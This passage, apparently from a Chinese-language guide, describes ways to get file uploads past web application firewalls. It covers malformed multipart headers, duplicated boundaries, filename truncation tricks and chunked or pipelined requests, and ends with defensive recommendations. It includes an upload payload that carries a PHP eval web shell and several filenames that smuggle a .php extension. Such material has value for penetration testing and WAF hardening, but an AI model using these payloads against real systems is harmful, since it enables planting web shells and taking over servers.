4. 文件上传绕过技术<\/h2>

4.1 Content-Disposition变形<\/h3>

引号变换<\/strong><\/p>

Content-Disposition: "form-data"; name=file_x; filename="xx.php"<\/code><\/li>
Content-Disposition: form-data; name=file_x; filename="xx.php"<\/code><\/li>
Content-Disposition: form-data; name="file_x"; filename="xx.php<\/code><\/li> <\/ul> <\/li>
分号变换<\/strong><\/p> Content-Disposition: form-data; name="file_x"; filename="xx.php;<\/code><\/li> <\/ul> <\/li> 使用特殊字符<\/strong><\/p> Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php"<\/code> (使用制表符)<\/li> <\/ul> <\/li> 多分号\/等号<\/strong><\/p> Content-Disposition: form-data; name="file_x";;; filename="test.php"<\/code><\/li> Content-Disposition: form-data; name=="file_x"; filename===="test.php"<\/code><\/li> <\/ul> <\/li> 值变形<\/strong><\/p> Content-Disposition: form-da+ta; name="file_x"; filename="xx.php"<\/code><\/li> Content-Disposition: fo r m-dat a; name="file_x"; filename="xx.php"<\/code><\/li> Content-Disposition: form-dataxx; name="file_x"; filename="xx.php"<\/code><\/li> <\/ul> <\/li> <\/ol> 4.2 Content-Type变形<\/h3> 大小写混合<\/strong><\/p> Content-Type: mUltiPart\/ForM-dATa; boundary=----WebKitFormBoundarye111<\/code><\/li> <\/ul> <\/li> 添加特殊字符<\/strong><\/p> Content-Type: multipart\/form-data a\boundary=----WebKitFormBoundarye111<\/code><\/li> Content-Type: multipart\/form-data,a\boundary=----WebKitFormBoundarye111<\/code><\/li> Content-Type: multipart\/form-data;bypass&123**{|}boundary=----WebKitFormBoundarye111<\/code> (仅PHP可行)<\/li> Content-Type: multipart\/form-data; boundary=----WebKitFormBoundarye111;123abc<\/code><\/li> <\/ul> <\/li> <\/ol> 4.3 顺序交换<\/h3> 交换name和filename顺序<\/strong><\/p> Content-Disposition: form-data; filename="xx.php"; name="file_x"<\/code><\/li> <\/ul> <\/li> 交换Content-Disposition和Content-Type顺序<\/strong><\/p> 先放Content-Type再放Content-Disposition<\/li> <\/ul> <\/li> <\/ol> 4.4 boundary内容重复<\/h3> ------WebKitFormBoundarymeEzpUTMsmOfjwAAContent-Disposition: form-data; name="upload_file"; filename="shell.jpg" Content-Type: image\/png <?php @eval($_POST['hack' WebKitFormBoundarymeEzpUTMsmOfjwAAContent-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: image\/png <?php @eval($_POST['hack' WebKitFormBoundarymeEzpUTMsmOfjwAAContent-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundarymeEzpUTMsmOfjwAA-- <\/code><\/pre> 4.5 数据截断技术<\/h3> 换行截断<\/strong><\/p> Content-Disposition: form-data; name="upload_file"; filename="shell.php"<\/code><\/li> <\/ul> <\/li> 分号截断<\/strong><\/p> Content-Disposition: form-data; name="upload_file"; filename="shell.jpg;.php"<\/code><\/li> <\/ul> <\/li> NULL字节截断<\/strong><\/p> Content-Disposition: form-data; name="upload_file"; filename="shell.php[0x00].jpg"<\/code><\/li> <\/ul> <\/li> 引号截断(PHP<5.3)<\/strong><\/p> Content-Disposition: form-data; name="upload_file"; filename="shell.jpg'.php"<\/code><\/li> Content-Disposition: form-data; name="upload_file"; filename="shell.jpg".php"<\/code><\/li> <\/ul> <\/li> <\/ol> 4.6 性能负载攻击<\/h3> 在关键位置插入大量垃圾数据<\/strong><\/p> 在filename参数中插入长随机字符串<\/li> 在Content-Type头部插入垃圾数据<\/li> <\/ul> <\/li> 分割请求数据<\/strong><\/p> 将恶意负载分散到多个位置<\/li> <\/ul> <\/li> <\/ol> 5. 高级绕过技术<\/h2> 5.1 Pipeline绕过<\/h3> 原理<\/strong>:<\/p> HTTP协议由TCP封装<\/li> 当Connection字段为keep-alive时，TCP连接保持<\/li> 可以附加攻击请求到正常请求后<\/li> <\/ul> 方法<\/strong>:<\/p> 关闭自动填充Content-Length<\/li> 修改Connection为keep-alive<\/li> 在正常请求后附加攻击请求<\/li> <\/ol> 5.2 分块编码传输<\/h3> 原理<\/strong>:<\/p> HTTP\/1.1支持分块传输编码<\/li> 数据分成多个部分发送<\/li> 服务器不需要预先知道总大小<\/li> <\/ul> 方法<\/strong>:<\/p> 使用Transfer-Encoding: chunked<\/li> 将攻击负载分成多个块<\/li> 使用工具如Burp Suite的"chunked-coding-converter"插件<\/li> <\/ol> 6. 防御建议<\/h2> 多层防御<\/strong><\/p> 结合网络层和应用层WAF<\/li> 使用云WAF+自定义规则<\/li> <\/ul> <\/li> 严格输入验证<\/strong><\/p> 对所有输入参数进行规范化处理<\/li> 实施白名单验证<\/li> <\/ul> <\/li> 协议一致性<\/strong><\/p> 确保WAF和后端使用相同的解析逻辑<\/li> 严格遵循HTTP协议规范<\/li> <\/ul> <\/li> 性能优化<\/strong><\/p> 针对内容溢出攻击优化性能<\/li> 设置合理的超时和大小限制<\/li> <\/ul> <\/li> 日志监控<\/strong><\/p> 记录所有异常请求<\/li> 实时监控可疑活动<\/li> <\/ul> <\/li> 规则更新<\/strong><\/p> 定期更新WAF规则<\/li> 针对新出现的绕过技术及时防护<\/li> <\/ul> <\/li> <\/ol> 7. 总结<\/h2> WAF绕过技术多种多样，从简单的编码变形到复杂的协议利用，攻击者不断寻找新的方法来规避检测。有效的防御需要深入理解这些技术原理，实施多层防御策略，并保持安全规则的持续更新。安全团队应当定期测试WAF的有效性，模拟各种绕过技术来验证防护能力。<\/p>

WAF绕过手法全面指南<\/h1>

1. WAF类型与检测特点<\/h2>

2. 通用绕过思路<\/h2>

3. 云WAF架构绕过<\/h2>

4. 文件上传绕过技术<\/h2>

5. 高级绕过技术<\/h2>